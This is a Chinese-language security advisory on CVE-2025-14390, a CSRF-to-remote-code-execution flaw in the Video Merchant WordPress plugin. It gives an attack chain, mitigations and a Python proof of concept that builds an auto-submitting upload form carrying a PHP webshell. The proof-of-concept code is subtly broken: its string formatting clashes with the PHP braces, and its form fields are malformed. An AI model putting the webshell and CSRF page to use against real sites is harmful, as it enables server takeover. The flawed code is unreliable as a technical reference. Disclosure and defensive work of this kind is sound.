CVE-2025-14390 WordPress Video Merchant插件CSRF漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-14390

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Video Merchant plugin for WordPress

漏洞概述

CVE-2025-14390是WordPress Video Merchant插件中的一个高危安全漏洞，CVSS评分达到8.8分。该漏洞存在于视频商家插件的5.0.4及以下版本中，由于video_merchant_add_video_file()函数缺少或存在不正确的nonce验证机制，导致该功能容易受到跨站请求伪造(CSRF)攻击。攻击者可以利用此漏洞，在无需任何身份认证的情况下，通过诱导网站管理员点击恶意链接或访问特定页面，伪造管理员请求，从而上传任意文件。一旦恶意文件被成功上传，攻击者即可实现远程代码执行(RCE)，完全控制受影响的WordPress站点。此漏洞的严重性在于其利用门槛较低，无需认证即可发起攻击，且成功利用后可获得服务器的完全控制权，对网站安全性构成重大威胁。建议所有使用该插件的用户立即采取防护措施。

技术细节

该漏洞的根本原因在于Video Merchant插件的video_merchant_add_video_file()函数在处理文件上传请求时，未能正确实施WordPress的nonce令牌验证机制。WordPress的nonce机制是一种防止CSRF攻击的安全措施，通过在表单和链接中嵌入随机生成的令牌，确保请求确实来自合法的用户操作。当插件缺少此验证时，攻击者可以构造恶意请求，欺骗已登录的管理员浏览器自动发送请求。在漏洞利用过程中，攻击者首先需要精心构造一个包含恶意文件的CSRF请求，该请求模拟正常的视频上传操作。由于浏览器会自动携带目标站点的cookies和认证信息，服务器会认为这是来自管理员的合法请求。随后，恶意文件（如PHP webshell）会被上传到服务器的可执行目录，攻击者即可通过访问该文件在服务器上执行任意命令，实现远程代码执行。整个攻击过程依赖于诱导管理员点击链接或访问特定页面，利用社工手段完成攻击链的最后一步。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意文件的CSRF payload，构造自动提交的文件上传表单

STEP 2

步骤2

攻击者将CSRF页面托管在恶意服务器上或通过钓鱼邮件等方式诱导目标网站管理员访问

STEP 3

步骤3

管理员浏览器加载CSRF页面后，自动向目标WordPress站点发送携带管理员cookies的文件上传请求

STEP 4

步骤4

由于插件未验证nonce，服务器将恶意文件（如PHP webshell）保存到可执行目录

STEP 5

步骤5

攻击者通过HTTP请求访问上传的webshell，发送系统命令实现远程代码执行

STEP 6

步骤6

攻击者完全控制WordPress服务器，可部署后门、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14390 PoC - CSRF to RCE in Video Merchant WordPress Plugin
# This PoC demonstrates how an attacker can exploit the CSRF vulnerability
# to upload arbitrary files and achieve RCE

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'
ADMIN_URL = f'{TARGET_URL}/wp-admin/admin.php?page=video-merchant'

def create_csrf_payload():
    """
    Generate HTML page with CSRF exploit that auto-submits malicious file upload
    """
    html_template = '''
    <!DOCTYPE html>
    <html>
    <head><title>Video Upload</title></head>
    <body>
    <h1>Loading video...</h1>
    <form id="exploit" action="{target}/wp-admin/admin.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="page" value="video-merchant">
        <input type="hidden" name="video_merchant_action" value="add_video_file">
        <input type="hidden" name="video_file" type="file">
        <!-- Malicious PHP webshell payload -->
        <textarea name="video_file"><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></textarea>
    </form>
    <script>document.getElementById('exploit').submit();</script>
    </body>
    </html>
    '''.format(target=TARGET_URL)
    return html_template

def check_vulnerability():
    """Check if target is vulnerable by verifying plugin version"""
    plugin_info_url = f'{TARGET_URL}/wp-content/plugins/video-merchant/readme.txt'
    try:
        response = requests.get(plugin_info_url, timeout=10)
        if response.status_code == 200 and 'Video Merchant' in response.text:
            return True
    except:
        pass
    return False

if __name__ == '__main__':
    print(f'[*] CVE-2025-14390 PoC for {TARGET_URL}')
    print(f'[*] Target appears vulnerable: {check_vulnerability()}')
    print('[+] Generate malicious HTML page and host it')
    print('[+] Trick admin into visiting the page')
    print('[+] Webshell will be uploaded to /wp-content/uploads/video-merchant/')

影响范围

Video Merchant plugin for WordPress <= 5.0.4

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 暂时禁用或删除Video Merchant插件；2) 使用Web应用防火墙(WAF)规则阻止可疑的文件上传请求；3) 为管理员账户启用双因素认证以增加攻击难度；4) 限制管理员访问后台的白名单IP范围；5) 监控wp-content/uploads目录下的异常文件创建行为；6) 使用安全插件如Wordfence实时监控可疑活动。建议优先考虑升级到插件最新版本以彻底消除该安全风险。